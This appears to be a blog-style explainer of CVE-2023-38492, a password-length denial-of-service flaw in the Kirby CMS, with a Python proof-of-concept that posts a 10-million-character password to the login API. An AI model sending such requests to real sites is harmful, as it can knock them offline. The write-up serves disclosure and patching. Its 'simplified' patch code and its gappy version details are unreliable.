Kirby is a popular flat-file content management system (CMS) known for its flexibility and simplicity. But even the best tools can have hidden security flaws. Recently, a vulnerability tracked as CVE-2023-38492 was discovered, affecting several versions of Kirby. In this deep dive, we'll break down what the bug is, why it matters, how it could be exploited, and what the Kirby team did to fix it. If you run a Kirby site, read on—using simple language, we'll help you understand the details and stay protected.
3.9.6
If your site has user accounts (and you have not disabled Kirby's API and Panel), you’re affected.
The problem?
Kirby did not limit the password length. That means someone could submit a password with thousands, hundreds of thousands, or even millions of characters when attempting to log in.
Why Is This a Problem?
Whenever you log in, Kirby takes your entered password and hashes it, comparing the result to the stored hash. Hashing is a CPU- and memory-intensive process. The longer the password, the harder (and longer) it is for the server to process.
If an attacker sent an extremely long password, the server would spend a lot of time and resources trying to process it. If this attack was repeated many times, your website could become unresponsive, or even go down.
This kind of issue is called a Denial of Service (DoS) vulnerability.
The Kirby team says the real-world impact is "limited." That's partly because
- Kirby has built-in brute-force protection: only 10 failed logins per IP, and only 10 failed logins per existing user per hour.
Attackers can't automate unlimited requests from a single IP.
But while mass exploitation is hard, a determined attacker could still use this flaw to slow down or (briefly) freeze your site, especially if you're running on a small or shared server.
Proof-of-Concept Exploit
Below is a simple proof-of-concept (PoC) in Python that shows how someone could abuse this issue. Notice: this is for educational purposes only, do not run it against servers you do not own!
import requests
URL = "https://your-kirby-site.com/api/auth/login"; # Replace with your real endpoint
USERNAME = "admin" # Replace with a valid username (could even be a guessed/brute-forced one)
HUGE_PASSWORD = "A" * 10000000 # 10 million characters
data = {
"email": USERNAME,
"password": HUGE_PASSWORD
}
response = requests.post(URL, json=data)
print('Status:', response.status_code)
print('Response:', response.text)
What this does:
How Did Kirby Patch CVE-2023-38492?
The fix is simple but effective. Starting with the patched versions, Kirby immediately rejects any password longer than 100 bytes both when setting and verifying passwords.
Example patched PHP code (simplified)
// Before patch: No length check
public function login($email, $password) {
// ... no restriction on $password length
$hash = password_hash($password, PASSWORD_DEFAULT);
// etc...
}
// After patch: Limit password length
public function login($email, $password) {
if (strlen($password) > 100) {
throw new Exception('Password is too long.');
}
$hash = password_hash($password, PASSWORD_DEFAULT);
// etc...
}
If someone tries to log in with an oversized password, the server instantly rejects it—without wasting CPU power on hashing.
How to Fix (and Protect Yourself)
1. Update immediately if you haven't!
3.9.6
See official release notes for details.
More References
- Kirby Security Advisory
- NIST NVD Entry for CVE-2023-38492
- Kirby Release Notes
Final Thoughts
CVE-2023-38492 may not be the scariest vulnerability out there, but it’s an important reminder: Even small oversights like missing input length limits can have real effects. The Kirby team acted quickly, so site owners can rest easier.
If you’re running Kirby, update now. And always remember—good security is a habit, not just a patch.
Timeline
Published on: 07/27/2023 16:15:00 UTC
Last modified on: 08/03/2023 13:35:00 UTC